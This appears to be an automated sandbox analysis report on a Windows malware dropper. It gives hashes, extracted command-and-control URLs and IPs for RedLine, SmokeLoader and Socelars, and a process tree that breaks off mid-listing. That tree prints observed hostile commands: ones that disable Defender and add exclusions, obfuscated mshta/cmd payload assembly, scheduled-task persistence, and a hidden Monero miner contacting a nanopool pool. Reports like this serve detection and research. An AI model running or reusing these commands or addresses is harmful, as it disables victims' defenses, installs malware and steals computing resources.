Resubmissions
28-10-2021 15:53
211028-tbqhfabhb2 1028-10-2021 05:27
211028-f5paksheak 1027-10-2021 14:29
211027-rt28vafah7 10Analysis
-
max time kernel
20s -
max time network
1809s -
submitted
01-01-1970 00:00
Static task
static1
Behavioral task
behavioral1
Sample
setup_installer.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_installer.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_installer.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_installer.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_installer.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_installer.exe
Resource
win10-en-20211014
Behavioral task
behavioral7
Sample
setup_installer.exe
Resource
win10-de-20210920
General
-
Target
setup_installer.exe
-
Size
4.6MB
-
MD5
b356bccf8b9aff2897ecc42970367f44
-
SHA1
fe06861ac4952834ddc290dd5e0e7f36c8adc018
-
SHA256
b9325691870376c72e29be06648c8106ceefd9a94dbbfbee9a4fc2b76fc9b6d3
-
SHA512
7fc510e5575e36919c302ff053eef6f7cb5700e9e011fb5d85dd80c5ec9c97664dcad8b6607b68b10daf8a6fbc584ff1218c30e541431fd32570da8553c662b7
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
redline
media26
91.121.67.60:23325
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral3/memory/2472-246-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral3/memory/2472-249-0x0000000000418D26-mapping.dmp family_redline behavioral3/memory/2548-262-0x0000000000418D32-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 1 IoCs
resource yara_rule behavioral3/files/0x00050000000132d8-101.dat family_socelars -
resource yara_rule behavioral3/files/0x000600000001267c-65.dat aspack_v212_v242 behavioral3/files/0x000600000001267c-64.dat aspack_v212_v242 behavioral3/files/0x00060000000126a2-63.dat aspack_v212_v242 behavioral3/files/0x00060000000126a2-62.dat aspack_v212_v242 behavioral3/files/0x00050000000130fe-69.dat aspack_v212_v242 behavioral3/files/0x00050000000130fe-68.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 20 IoCs
pid Process 1428 setup_install.exe 1880 Wed0901eb1dae126e32.exe 1876 Wed09abf83d9c2.exe 816 Wed09d27135e5a8b3b.exe 2040 Wed09d8d6edfaff2ac.exe 1824 Wed09e95ff6b5.exe 1420 Wed09abf83d9c2.exe 1596 Wed09f257bb7877d00b2.exe 1060 Wed0971f17486f8.exe 1324 Wed096a1bff61.exe 1980 XYB0bVL96aEKhA.exE 2044 Wed09977fdc12334.exe 1036 Wed09c42cad92c20f79.exe 1812 Wed09db0d52c38.exe 668 Process not Found 1928 Wed094c47c32b.exe 1104 mshta.exe 1728 Wed09d27135e5a8b3b.tmp 1696 8912629.exe 2096 Wed09d27135e5a8b3b.tmp -
Loads dropped DLL 64 IoCs
pid Process 1120 setup_installer.exe 1120 setup_installer.exe 1120 setup_installer.exe 1428 setup_install.exe 1428 setup_install.exe 1428 setup_install.exe 1428 setup_install.exe 1428 setup_install.exe 1428 setup_install.exe 1428 setup_install.exe 1428 setup_install.exe 1268 cmd.exe 1268 cmd.exe 668 Wed09cfb2f9758281d8.exe 1880 Wed0901eb1dae126e32.exe 1880 Wed0901eb1dae126e32.exe 1348 cmd.exe 1876 Wed09abf83d9c2.exe 1876 Wed09abf83d9c2.exe 816 Wed09d27135e5a8b3b.exe 816 Wed09d27135e5a8b3b.exe 1680 cmd.exe 1480 cmd.exe 1664 cmd.exe 1876 Wed09abf83d9c2.exe 2040 Wed09d8d6edfaff2ac.exe 2040 Wed09d8d6edfaff2ac.exe 1420 Wed09abf83d9c2.exe 1420 Wed09abf83d9c2.exe 1952 cmd.exe 1952 cmd.exe 1824 Wed09e95ff6b5.exe 1824 Wed09e95ff6b5.exe 932 cmd.exe 932 cmd.exe 1224 cmd.exe 544 cmd.exe 916 cmd.exe 860 cmd.exe 860 cmd.exe 1376 cmd.exe 1376 cmd.exe 976 cmd.exe 1708 cmd.exe 816 Process not Found 1060 Wed0971f17486f8.exe 1060 Wed0971f17486f8.exe 1036 Wed09c42cad92c20f79.exe 1036 Wed09c42cad92c20f79.exe 1928 Wed094c47c32b.exe 1928 Wed094c47c32b.exe 1980 XYB0bVL96aEKhA.exE 1980 XYB0bVL96aEKhA.exE 668 Process not Found 668 Process not Found 1104 mshta.exe 1104 mshta.exe 1812 Wed09db0d52c38.exe 1812 Wed09db0d52c38.exe 1728 Wed09d27135e5a8b3b.tmp 1728 Wed09d27135e5a8b3b.tmp 1728 Wed09d27135e5a8b3b.tmp 1728 Wed09d27135e5a8b3b.tmp 1696 8912629.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 72 ipinfo.io 113 freegeoip.app 115 freegeoip.app 116 freegeoip.app 118 freegeoip.app 11 ip-api.com 44 ipinfo.io 45 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
autoit_exe 5 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral3/files/0x00050000000132da-107.dat autoit_exe behavioral3/files/0x00050000000132da-150.dat autoit_exe behavioral3/files/0x00050000000132da-159.dat autoit_exe behavioral3/files/0x00050000000132da-175.dat autoit_exe behavioral3/files/0x00050000000132da-176.dat autoit_exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
pid pid_target Process procid_target 2908 2040 WerFault.exe 51 2712 2044 WerFault.exe 68 2592 1036 WerFault.exe 69 4012 1656 WerFault.exe 115 2524 2092 WerFault.exe 113 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3412 schtasks.exe -
Kills process with taskkill 4 IoCs
pid Process 2864 taskkill.exe 1076 taskkill.exe 1540 taskkill.exe 3096 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 1812 Wed09db0d52c38.exe Token: SeAssignPrimaryTokenPrivilege 1812 Wed09db0d52c38.exe Token: SeLockMemoryPrivilege 1812 Wed09db0d52c38.exe Token: SeIncreaseQuotaPrivilege 1812 Wed09db0d52c38.exe Token: SeMachineAccountPrivilege 1812 Wed09db0d52c38.exe Token: SeTcbPrivilege 1812 Wed09db0d52c38.exe Token: SeSecurityPrivilege 1812 Wed09db0d52c38.exe Token: SeTakeOwnershipPrivilege 1812 Wed09db0d52c38.exe Token: SeLoadDriverPrivilege 1812 Wed09db0d52c38.exe Token: SeSystemProfilePrivilege 1812 Wed09db0d52c38.exe Token: SeSystemtimePrivilege 1812 Wed09db0d52c38.exe Token: SeProfSingleProcessPrivilege 1812 Wed09db0d52c38.exe Token: SeIncBasePriorityPrivilege 1812 Wed09db0d52c38.exe Token: SeCreatePagefilePrivilege 1812 Wed09db0d52c38.exe Token: SeCreatePermanentPrivilege 1812 Wed09db0d52c38.exe Token: SeBackupPrivilege 1812 Wed09db0d52c38.exe Token: SeRestorePrivilege 1812 Wed09db0d52c38.exe Token: SeShutdownPrivilege 1812 Wed09db0d52c38.exe Token: SeDebugPrivilege 1812 Wed09db0d52c38.exe Token: SeAuditPrivilege 1812 Wed09db0d52c38.exe Token: SeSystemEnvironmentPrivilege 1812 Wed09db0d52c38.exe Token: SeChangeNotifyPrivilege 1812 Wed09db0d52c38.exe Token: SeRemoteShutdownPrivilege 1812 Wed09db0d52c38.exe Token: SeUndockPrivilege 1812 Wed09db0d52c38.exe Token: SeSyncAgentPrivilege 1812 Wed09db0d52c38.exe Token: SeEnableDelegationPrivilege 1812 Wed09db0d52c38.exe Token: SeManageVolumePrivilege 1812 Wed09db0d52c38.exe Token: SeImpersonatePrivilege 1812 Wed09db0d52c38.exe Token: SeCreateGlobalPrivilege 1812 Wed09db0d52c38.exe Token: 31 1812 Wed09db0d52c38.exe Token: 32 1812 Wed09db0d52c38.exe Token: 33 1812 Wed09db0d52c38.exe Token: 34 1812 Wed09db0d52c38.exe Token: 35 1812 Wed09db0d52c38.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1824 Wed09e95ff6b5.exe 1824 Wed09e95ff6b5.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1824 Wed09e95ff6b5.exe 1824 Wed09e95ff6b5.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1120 wrote to memory of 1428 1120 setup_installer.exe 29 PID 1120 wrote to memory of 1428 1120 setup_installer.exe 29 PID 1120 wrote to memory of 1428 1120 setup_installer.exe 29 PID 1120 wrote to memory of 1428 1120 setup_installer.exe 29 PID 1120 wrote to memory of 1428 1120 setup_installer.exe 29 PID 1120 wrote to memory of 1428 1120 setup_installer.exe 29 PID 1120 wrote to memory of 1428 1120 setup_installer.exe 29 PID 1428 wrote to memory of 1388 1428 setup_install.exe 31 PID 1428 wrote to memory of 1388 1428 setup_install.exe 31 PID 1428 wrote to memory of 1388 1428 setup_install.exe 31 PID 1428 wrote to memory of 1388 1428 setup_install.exe 31 PID 1428 wrote to memory of 1388 1428 setup_install.exe 31 PID 1428 wrote to memory of 1388 1428 setup_install.exe 31 PID 1428 wrote to memory of 1388 1428 setup_install.exe 31 PID 1428 wrote to memory of 1380 1428 setup_install.exe 32 PID 1428 wrote to memory of 1380 1428 setup_install.exe 32 PID 1428 wrote to memory of 1380 1428 setup_install.exe 32 PID 1428 wrote to memory of 1380 1428 setup_install.exe 32 PID 1428 wrote to memory of 1380 1428 setup_install.exe 32 PID 1428 wrote to memory of 1380 1428 setup_install.exe 32 PID 1428 wrote to memory of 1380 1428 setup_install.exe 32 PID 1428 wrote to memory of 1664 1428 setup_install.exe 33 PID 1428 wrote to memory of 1664 1428 setup_install.exe 33 PID 1428 wrote to memory of 1664 1428 setup_install.exe 33 PID 1428 wrote to memory of 1664 1428 setup_install.exe 33 PID 1428 wrote to memory of 1664 1428 setup_install.exe 33 PID 1428 wrote to memory of 1664 1428 setup_install.exe 33 PID 1428 wrote to memory of 1664 1428 setup_install.exe 33 PID 1428 wrote to memory of 976 1428 setup_install.exe 34 PID 1428 wrote to memory of 976 1428 setup_install.exe 34 PID 1428 wrote to memory of 976 1428 setup_install.exe 34 PID 1428 wrote to memory of 976 1428 setup_install.exe 34 PID 1428 wrote to memory of 976 1428 setup_install.exe 34 PID 1428 wrote to memory of 976 1428 setup_install.exe 34 PID 1428 wrote to memory of 976 1428 setup_install.exe 34 PID 1428 wrote to memory of 1680 1428 setup_install.exe 35 PID 1428 wrote to memory of 1680 1428 setup_install.exe 35 PID 1428 wrote to memory of 1680 1428 setup_install.exe 35 PID 1428 wrote to memory of 1680 1428 setup_install.exe 35 PID 1428 wrote to memory of 1680 1428 setup_install.exe 35 PID 1428 wrote to memory of 1680 1428 setup_install.exe 35 PID 1428 wrote to memory of 1680 1428 setup_install.exe 35 PID 1428 wrote to memory of 916 1428 setup_install.exe 36 PID 1428 wrote to memory of 916 1428 setup_install.exe 36 PID 1428 wrote to memory of 916 1428 setup_install.exe 36 PID 1428 wrote to memory of 916 1428 setup_install.exe 36 PID 1428 wrote to memory of 916 1428 setup_install.exe 36 PID 1428 wrote to memory of 916 1428 setup_install.exe 36 PID 1428 wrote to memory of 916 1428 setup_install.exe 36 PID 1428 wrote to memory of 1952 1428 setup_install.exe 37 PID 1428 wrote to memory of 1952 1428 setup_install.exe 37 PID 1428 wrote to memory of 1952 1428 setup_install.exe 37 PID 1428 wrote to memory of 1952 1428 setup_install.exe 37 PID 1428 wrote to memory of 1952 1428 setup_install.exe 37 PID 1428 wrote to memory of 1952 1428 setup_install.exe 37 PID 1428 wrote to memory of 1952 1428 setup_install.exe 37 PID 1428 wrote to memory of 544 1428 setup_install.exe 38 PID 1428 wrote to memory of 544 1428 setup_install.exe 38 PID 1428 wrote to memory of 544 1428 setup_install.exe 38 PID 1428 wrote to memory of 544 1428 setup_install.exe 38 PID 1428 wrote to memory of 544 1428 setup_install.exe 38 PID 1428 wrote to memory of 544 1428 setup_install.exe 38 PID 1428 wrote to memory of 544 1428 setup_install.exe 38 PID 1428 wrote to memory of 1268 1428 setup_install.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS064998E5\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable3⤵PID:1388
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵PID:1380
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09f257bb7877d00b2.exe3⤵
- Loads dropped DLL
PID:1664 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09f257bb7877d00b2.exeWed09f257bb7877d00b2.exe4⤵
- Executes dropped EXE
PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b3a5ca1a712d390.exe3⤵
- Loads dropped DLL
PID:976 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09b3a5ca1a712d390.exeWed09b3a5ca1a712d390.exe4⤵PID:1104
-
C:\Users\Admin\AppData\Roaming\1855448.exe"C:\Users\Admin\AppData\Roaming\1855448.exe"5⤵PID:2652
-
-
C:\Users\Admin\AppData\Roaming\1736709.exe"C:\Users\Admin\AppData\Roaming\1736709.exe"5⤵PID:2832
-
-
C:\Users\Admin\AppData\Roaming\7187603.exe"C:\Users\Admin\AppData\Roaming\7187603.exe"5⤵PID:2828
-
-
C:\Users\Admin\AppData\Roaming\8912629.exe"C:\Users\Admin\AppData\Roaming\8912629.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1696 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"6⤵PID:2580
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d8d6edfaff2ac.exe3⤵
- Loads dropped DLL
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09d8d6edfaff2ac.exeWed09d8d6edfaff2ac.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2040 -
C:\Users\Admin\Pictures\Adobe Films\yGmfonyxYbISb2xD7KXB8tzK.exe"C:\Users\Admin\Pictures\Adobe Films\yGmfonyxYbISb2xD7KXB8tzK.exe"5⤵PID:2564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 14885⤵
- Program crash
PID:2908
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed096a1bff61.exe3⤵
- Loads dropped DLL
PID:916 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed096a1bff61.exeWed096a1bff61.exe4⤵
- Executes dropped EXE
PID:1324 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵PID:2420
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"6⤵PID:1556
-
C:\Users\Admin\AppData\Roaming\203948.exe"C:\Users\Admin\AppData\Roaming\203948.exe"7⤵PID:3748
-
-
C:\Users\Admin\AppData\Roaming\1013177.exe"C:\Users\Admin\AppData\Roaming\1013177.exe"7⤵PID:3852
-
-
C:\Users\Admin\AppData\Roaming\8689308.exe"C:\Users\Admin\AppData\Roaming\8689308.exe"7⤵PID:3868
-
-
C:\Users\Admin\AppData\Roaming\3119675.exe"C:\Users\Admin\AppData\Roaming\3119675.exe"7⤵PID:3948
-
-
C:\Users\Admin\AppData\Roaming\3526401.exe"C:\Users\Admin\AppData\Roaming\3526401.exe"7⤵PID:3964
-
-
C:\Users\Admin\AppData\Roaming\6804760.exe"C:\Users\Admin\AppData\Roaming\6804760.exe"7⤵PID:2512
-
-
C:\Users\Admin\AppData\Roaming\1794707.exe"C:\Users\Admin\AppData\Roaming\1794707.exe"7⤵PID:4072
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"6⤵PID:2708
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"6⤵PID:2092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 9047⤵
- Program crash
PID:2524
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"6⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:3496
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"6⤵PID:1656
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1656 -s 14047⤵
- Program crash
PID:4012
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"6⤵PID:1884
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )7⤵PID:1580
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"8⤵PID:2308
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"9⤵
- Kills process with taskkill
PID:3096
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi9⤵PID:3088
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵PID:3140
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"11⤵PID:3436
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )10⤵PID:3560
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC11⤵PID:3716
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"12⤵PID:3804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "12⤵PID:3796
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC12⤵PID:3200
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"6⤵PID:2144
-
-
C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"6⤵PID:1324
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"6⤵PID:2224
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"6⤵PID:2388
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"6⤵PID:2364
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵PID:3596
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:3436
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
- Creates scheduled task(s)
PID:3412
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:3736
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe9⤵PID:3812
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵PID:3968
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"11⤵PID:3300
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"12⤵PID:1352
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth11⤵PID:2344
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0971f17486f8.exe3⤵
- Loads dropped DLL
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed0971f17486f8.exeWed0971f17486f8.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1060 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed0971f17486f8.exe5⤵PID:2472
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09db0d52c38.exe3⤵
- Loads dropped DLL
PID:544 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09db0d52c38.exeWed09db0d52c38.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1812 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:2068
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:1540
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0901eb1dae126e32.exe3⤵
- Loads dropped DLL
PID:1268 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed0901eb1dae126e32.exeWed0901eb1dae126e32.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1880 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed0901eb1dae126e32.exe5⤵PID:2464
-
-
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed0901eb1dae126e32.exe5⤵PID:2548
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09cfb2f9758281d8.exe /mixone3⤵
- Loads dropped DLL
PID:860 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09cfb2f9758281d8.exeWed09cfb2f9758281d8.exe /mixone4⤵
- Loads dropped DLL
PID:668 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed09cfb2f9758281d8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09cfb2f9758281d8.exe" & exit5⤵PID:2816
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Wed09cfb2f9758281d8.exe" /f6⤵
- Kills process with taskkill
PID:2864
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09e95ff6b5.exe3⤵
- Loads dropped DLL
PID:1480 -
C:\Users\Admin\AppData\Local\Temp\7zS064998E5\Wed09e95ff6b5.exeWed09e95ff6b5.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1824 -
C:\Users\Public\run.exeC:\Users\Public\run.exe5⤵PID:3024
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe5⤵PID:3056
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/18tji76⤵PID:2464
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2464 CREDAT:275457 /prefetch:27⤵PID:1876
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09c42cad92c20f79.exe3⤵
- Loads dropped DLL
PID:932 -
